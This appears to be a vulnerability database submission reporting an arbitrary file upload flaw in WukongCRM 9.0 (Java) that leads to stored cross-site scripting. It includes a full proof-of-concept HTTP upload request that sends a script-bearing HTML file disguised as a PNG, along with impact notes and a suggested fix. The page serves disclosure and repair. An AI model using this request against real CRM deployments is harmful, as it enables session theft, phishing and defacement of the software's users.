Submit #587201: WukongSoftware WukongCRM-9.0-JAVA v9.0 Unrestricted Uploadinfo

TitleWukongSoftware WukongCRM-9.0-JAVA v9.0 Unrestricted Upload
DescriptionArbitrary File Upload vulnerability in WukongCRM-9.0-JAVA allows leads to Stored Cross-Site Scripting via # NAME OF AFFECTED PRODUCT(S) - WukongCRM ## Vendor Homepage https://github.com/WukongSoftware # AFFECTED AND/OR FIXED VERSION(S) ## submitter - aiyakami,Yveslawtox,luokuang1 ## Vulnerable File - AdminSysConfigController.java ## VERSION(S) - V9.0 ## Software Link - https://github.com/WuKongOpenSource/WukongCRM-9.0-JAVA # PROBLEM TYPE ## Vulnerability Type - Arbitrary File Upload → Stored XSS ## Root Cause - The file upload feature in WukongCRM fails to properly validate file content types and extensions (e.g., .svg, .html). Attackers can upload malicious files containing JavaScript code, which are then rendered by victims' browsers, leading to persistent Cross-Site Scripting (XSS). ## Impact - Attackers can upload malicious files disguised as images, which, when rendered by the application or accessed by users, execute arbitrary JavaScript in their browsers. #Successful exploitation can lead to: - Session hijacking (stealing cookies via document.cookie). - Phishing attacks (fake login forms injected via XSS). - Defacement (modifying website content to display false information). - Malware distribution (redirecting users to malicious sites). # DESCRIPTION - During a security review of WukongCRM, a critical arbitrary file upload vulnerability was discovered in UploadController.java. The issue arises due to inadequate file validation, allowing attackers to upload malicious files that bypass security checks. # Vulnerability details and POC ## Vulnerability lonameion: - **`AdminSysConfigController.java`** ## Payload: Example: An attacker uploads an html file containing <script>alert(1)</script>, which executes when rendered in a browser. ``` POST /sysConfig/setSysConfig HTTP/1.1 Host: localhost:7878 Admin-Token: 295686fee64347fe9bb050be3669a7e4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Accept: application/json, text/plain, */* sec-ch-ua: "Chromium";v="136", "Google Chrome";v="136", "Not.A/Brand";v="99" Sec-Fetch-Site: same-origin Accept-Language: zh-CN,zh;q=0.9 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHLZQn7vemaJqD2Pn Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Sec-Fetch-Mode: cors Referer: http://localhost:7878/index.html sec-ch-ua-platform: "Windows" Origin: http://localhost:7878 sec-ch-ua-mobile: ?0 Content-Length: 6557 ------WebKitFormBoundaryHLZQn7vemaJqD2Pn Content-Disposition: form-data; name="name" adsa ------WebKitFormBoundaryHLZQn7vemaJqD2Pn Content-Disposition: form-data; name="file"; filename="test.html" Content-Type: image/png {{unquote("<script>alert('xss')</script>")}} ------WebKitFormBoundaryHLZQn7vemaJqD2Pn-- ``` ## The following are screenshots of some specific information obtained from testing and running with the yakit tool: ![Image](https://github.com/user-attachments/assets/6e7c51ec-f2ec-4126-bdc5-20c6b9ef45a2) ![Image](https://github.com/user-attachments/assets/669164d2-85f2-466b-848c-7497f6f6689a) # Suggested repair 1. **Strict File Extension Whitelisting** Only allow safe extensions (e.g., .jpg, .png, .gif) and reject dangerous ones (e.g., .svg, .html, .php).
Source⚠️ https://github.com/Aiyakami/CVE-1/issues/7
User
 aiyakami (UID 85128)
Submission05/30/2025 04:24 AM (2 months ago)
Moderation06/08/2025 08:11 PM (10 days later)
StatusAccepted
VulDB Entry311637 [WuKongOpenSource WukongCRM 9.0 File Upload AdminSysConfigController.java cross site scripting]
Points20

PreviousOverviewNext

Want to stay up to date on a daily basis?

Enable the mail alert feature now!